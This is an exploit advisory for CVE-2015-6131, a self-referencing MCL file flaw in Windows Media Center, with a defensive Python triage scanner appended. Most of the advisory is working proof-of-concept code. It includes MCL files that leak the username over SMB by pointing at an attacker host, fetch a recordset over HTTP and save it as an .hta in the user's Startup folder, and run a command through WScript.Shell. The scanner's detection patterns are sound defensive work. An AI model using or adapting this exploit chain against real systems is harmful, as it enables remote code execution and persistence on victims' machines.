"Microsoft Windows Media Center Library - Parsing Remote Code Execution aka 'self-executing' MCL File"

Author: Eduardo Braun Prado

Platform: windows

Release date: 2015-12-09

Title: Microsoft Windows Media Center Library Parsing RCE Vuln aka "self-executing" MCL file (CVE-2015-6131)

Software Vendor: Microsoft

Software version: MS Windows Media Center, latest version at the time of writing, on any Windows OS that ships it.

Software Vendor Homepage: http://www.microsoft.com

CVE: CVE-2015-6131

Exploit Author: Eduardo Braun Prado

Vulnerability official discoverer: Zhang YunHai of NSFOCUS Security Team

Date: December 8, 2015

Vulnerability description:

Windows Media Center contains a remote code execution vulnerability because it allows an "MCL" file to reference itself as the HTML page to load. That page is then parsed inside the Windows Media Center window in the context of Internet Explorer's Local Machine security zone, where script may instantiate ActiveX objects such as ADO (ADODB.Recordset) and use them to write arbitrary files to disk; this in turn allows execution of arbitrary code. Hence the name "self-executing" MCL files.


Exploit code below:

----------- self-exec1.mcl ------------------------------------

<application url="self-exec1.mcl"/><html><!-- The url attribute points at this very file, so Media Center loads the MCL itself as an HTML page in the Local Machine zone and runs the script below. --><script>alert('I am running in the Local Machine zone, which allows arbitrary code execution via, for example, ADO objects')</script></html>

------------------------------------------------------------

----------- self-exec2.mcl --------------------------------------

<application url="self-exec2.mcl"/><html><!-- Full chain: the <img> UNC reference makes the victim connect over SMB to the attacker host (sniff that traffic to learn the Windows username needed for the Startup folder path); ADODB.Recordset then fetches the persisted recordset over HTTP and saves it into the user's Startup folder as an .hta, which runs at the next logon. 192.168.10.10 is the attacker host; replace "windowsuser" with the sniffed username. --><b>Use a sniffer to capture the SMB traffic and retrieve the remote Windows username required for this exploit</b><img src=\\192.168.10.10\smbshare\someimg.jpg></img><script>
RecordsetURL = 'http://192.168.10.10:80/recordsetfile.txt';
var rs = new ActiveXObject('ADODB.recordset');
rs.Open(RecordsetURL);   // load the recordset persisted by Create-recordsetfile.hta
rs.Save('C:/users/windowsuser/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/poc.hta');
rs.Close();
</script></html>
----------------------------------------------------------

-----Create-recordsetfile.hta --------------

<!-- Run on the attacker side: reads recordsetdata.txt (the HTML/script payload) through the
     ODBC Text driver and persists it as an ADO recordset named recordsetfile.txt, which is the
     file self-exec2.mcl fetches over HTTP. -->
<html><body onload="aa()">

<script language="VBScript">

function aa()

defdir = "."

alert "This script will retrieve data from ""recordsetdata.txt"" and save it to the current directory as ""recordsetfile.txt""."

' Open the payload text file as a table via the ODBC Text driver
Set c = CreateObject("ADODB.Connection")
co = "Driver={Microsoft Text Driver (*.txt; *.csv)};DefaultDir=" & defdir & ";Extensions=txt;"
c.Open co
Set rs = CreateObject("ADODB.Recordset")
rs.Open "SELECT * from recordsetdata.txt", c
' Persist the recordset (default ADTG format); the MCL re-opens and re-saves it as an .hta
rs.Save defdir & "\recordsetfile.txt"
rs.Close

end function
</script></body></html>

-------------------------------------------------------------------------------


---------recordsetdata.txt------------------------------------------

<html>
<script>a=new ActiveXObject('Wscript.Shell')</script>
<script>a.Run('calc.exe',1);</script>
</html>
-------------------------------------------------------------------
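The triage scanner below is an added example and is not part of the original advisory or its PoC. It demonstrates the detection side of the vulnerability description and of the two MCL files above: a legitimate .mcl is a short shortcut whose <application url="..."> points at a web application, so a file whose url resolves to the MCL itself (or to any local or UNC path), or that carries HTML, <script>, ActiveXObject/ADODB references, or a UNC image reference, matches the "self-executing" pattern. The sample inputs are constructed: the first two are trimmed copies of self-exec1.mcl and self-exec2.mcl from this page, the third is an assumed benign shortcut with a made-up host name (media.example.invalid).

```python
import re
from urllib.parse import urlsplit, unquote

# The PoC .mcl files are not well-formed XML (the <html> that follows the
# <application/> element is never wrapped in a root), so a tolerant regex is
# used instead of an XML parser.
APP_RE = re.compile(r"<application\b([^>]*)>", re.IGNORECASE)
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s/>]+))""")
# A UNC reference such as \\192.168.10.10\share\x.jpg makes Media Center reach out over SMB.
UNC_RE = re.compile(r"\\\\[\w.-]+\\")
# None of these belong in a library shortcut that should only point at a web application.
SUSPICIOUS_MARKERS = ("<html", "<script", "activexobject", "adodb", "wscript.shell")


def parse_application_attrs(text):
    """Return the attributes of the first <application> element, names lower-cased."""
    m = APP_RE.search(text)
    if not m:
        return {}
    attrs = {}
    for name, dq, sq, bare in ATTR_RE.findall(m.group(1)):
        attrs[name.lower()] = dq or sq or bare
    return attrs


def classify_url(url, own_name):
    """Classify the url attribute as 'none', 'remote', 'self' or 'local'.

    Anything that is not http(s) is treated as local: a bare relative name, a
    drive path, a file: URL or a UNC path. If the referenced file name equals
    the MCL's own name, it is the self-referencing pattern from the advisory.
    """
    if not url:
        return "none"
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme in ("http", "https"):
        return "remote"
    # file: URLs carry the path in .path; a drive letter (C:\...) is misread as a
    # scheme by urlsplit, so fall back to the raw string for everything else.
    path = unquote(parts.path) if scheme == "file" else url
    basename = re.split(r"[\\/]", path)[-1]
    return "self" if basename.lower() == own_name.lower() else "local"


def triage_mcl(text, filename):
    """Triage one .mcl file and return its url class, findings and verdict."""
    attrs = parse_application_attrs(text)
    url = attrs.get("url", "")
    url_class = classify_url(url, filename)
    findings = []
    if url_class == "self":
        findings.append("application url points back at the MCL itself (self-executing pattern)")
    elif url_class == "local":
        findings.append("application url is a local or UNC path, not an http(s) URL")
    elif url_class == "none":
        findings.append("no <application url=...> element found")
    lowered = text.lower()
    for marker in SUSPICIOUS_MARKERS:
        if marker in lowered:
            findings.append(f"embedded content contains {marker!r}")
    if UNC_RE.search(text):
        findings.append("UNC path reference (SMB connection, possible credential leak)")
    return {
        "url": url,
        "url_class": url_class,
        "findings": findings,
        "verdict": "suspicious" if findings else "clean",
    }


# Constructed samples: the first two reproduce the advisory's PoC files (trimmed),
# the third is an assumed benign shortcut to a remote web application (made-up host).
SAMPLES = {
    "self-exec1.mcl": '<application url="self-exec1.mcl"/><html><script>alert(1)</script></html>',
    "self-exec2.mcl": (
        '<application url="self-exec2.mcl"/><html>'
        '<img src=\\\\192.168.10.10\\smbshare\\someimg.jpg></img>'
        "<script>var rs = new ActiveXObject('ADODB.recordset');</script></html>"
    ),
    "benign.mcl": '<application url="https://media.example.invalid/app/start.htm" name="Example"/>',
}


if __name__ == "__main__":
    for name, content in SAMPLES.items():
        result = triage_mcl(content, name)
        print(f"{name}: {result['verdict']} ({result['url_class']})")
        for finding in result["findings"]:
            print("  -", finding)
```

Run it against a directory of .mcl files by reading each file and passing its basename as the second argument; the url classification alone is enough to catch the self-referencing pattern even when the embedded payload is obfuscated, while the marker checks catch HTML payloads that point the url somewhere else local.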